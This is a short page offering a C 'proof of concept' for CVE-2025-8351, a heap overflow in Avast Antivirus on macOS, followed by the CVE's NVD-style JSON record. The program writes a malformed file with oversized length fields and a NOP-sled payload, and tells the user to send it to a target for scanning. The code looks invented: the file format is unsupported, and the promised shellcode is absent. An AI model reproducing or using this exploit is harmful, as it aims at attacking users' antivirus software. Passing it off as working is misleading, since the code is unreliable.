CVE-2025-8351

// CVE-2025-8351 PoC - Malformed file to trigger heap overflow in Avast Antivirus MacOS // This PoC creates a minimal malformed file that may trigger the buffer overflow // WARNING: For educational and security research purposes only #include <stdio.h> #include <stdlib.h> #include <string.h> // Malformed file header structure typedef struct { char magic[4]; // File signature uint32_t version; // File version uint32_t data_size; // Size of data section uint32_t overflow_len; // Length that triggers overflow char payload[1024]; // Malicious payload } __attribute__((packed)) malformed_file_t; void create_malformed_poc(const char* filename) { FILE* fp = fopen(filename, "wb"); if (!fp) { perror("Failed to create file"); return; } malformed_file_t file; // Set magic bytes (file signature) memcpy(file.magic, "AVSC", 4); file.version = 0x00000001; // Trigger overflow with excessive size value file.data_size = 0xFFFFFFFF; // Max uint32 to trigger overflow file.overflow_len = 0x10000; // Large overflow length // Fill payload with NOP sled + shellcode pattern memset(file.payload, 0x90, sizeof(file.payload)); // Write malformed file fwrite(&file, sizeof(malformed_file_t), 1, fp); fclose(fp); printf("PoC file created: %s\n", filename); printf("Send this file to target for scanning via Avast Antivirus\n"); } int main(int argc, char* argv[]) { const char* filename = "cve_2025_8351_poc.avs"; if (argc > 1) { filename = argv[1]; } create_malformed_poc(filename); return 0; }

{"cve": {"id": "CVE-2025-8351", "sourceIdentifier": "[email protected]", "published": "2025-12-01T16:15:57.857", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Heap-based Buffer Overflow, Out-of-bounds Read vulnerability in Avast Antivirus on MacOS when scanning a malformed file may allow Local Execution of Code or Denial-of-Service of the anitvirus engine process.This issue affects Antivirus: from 8.3.70.94 before 8.3.70.98."}, {"lang": "es", "value": "Desbordamiento de búfer basado en montículo, vulnerabilidad de lectura fuera de los límites en Avast Antivirus en MacOS al escanear un archivo malformado puede permitir la ejecución local de código o la denegación de servicio del proceso del motor del antivirus. Este problema afecta a Antivirus: desde 8.3.70.94 hasta 8.3.70.98."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-122"}, {"lang": "en", "value": "CWE-125"}]}], "references": [{"url": "https://www.gendigital.com/us/en/contact-us/security-advisories/", "source": "[email protected]"}]}}